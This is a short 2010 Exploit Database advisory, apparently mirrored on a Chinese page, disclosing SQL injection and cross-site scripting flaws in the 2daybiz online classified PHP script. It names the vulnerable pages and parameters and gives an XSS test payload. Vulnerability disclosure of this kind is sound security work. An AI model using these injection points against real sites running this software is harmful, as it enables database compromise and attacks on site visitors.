2DayBiz Online Classified System – SQL Injection / Cross-Site Scripting

• Exploit Database
• 9 阅读

• 作者： Sid3^effects
  日期： 2010-06-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13894/

• Name : 2daybiz online classified system SQLi AND XSS Vulnerability
  Date : june, 16 2010
  Vendor url :http://www.2daybiz.com/online_classified_script.html
  Critical Level 	: HIGH
  Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
  special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
  greetz to :All ICW members and my friends :) luv y0 guyz 
  #######################################################################################################
  DESCRIPTION:
  2daybiz online classified system allows you to start a fully automated classified ads site that includes essential features present in major classifieds sites. Our powerful script written in PHP allows your users to post new ads, for which you can charge a predefined amount. Billing is handled automatically and seamlessly through many of the popular payment gateways. Our classified ads software is fast, simple and fully customized through our built-in editor.
  
  #######################################################################################################
  Xploit: SQLI Vulnerability 
  
  DEMO URL : http://[site]/products/orkutclone/view_photo.php?page=3&alb=[SQLI]
  ###############################################################################################################
  Xploit: XSS Vulnerability 
  
  Attack Pattern: '"--><script>alert(0x000872)</script>
  DEMO URL :http://[site]/products/classified/headersearch.php?sid=[XSS]
  ###############################################################################################################
  # 0day no more 
  # Sid3^effects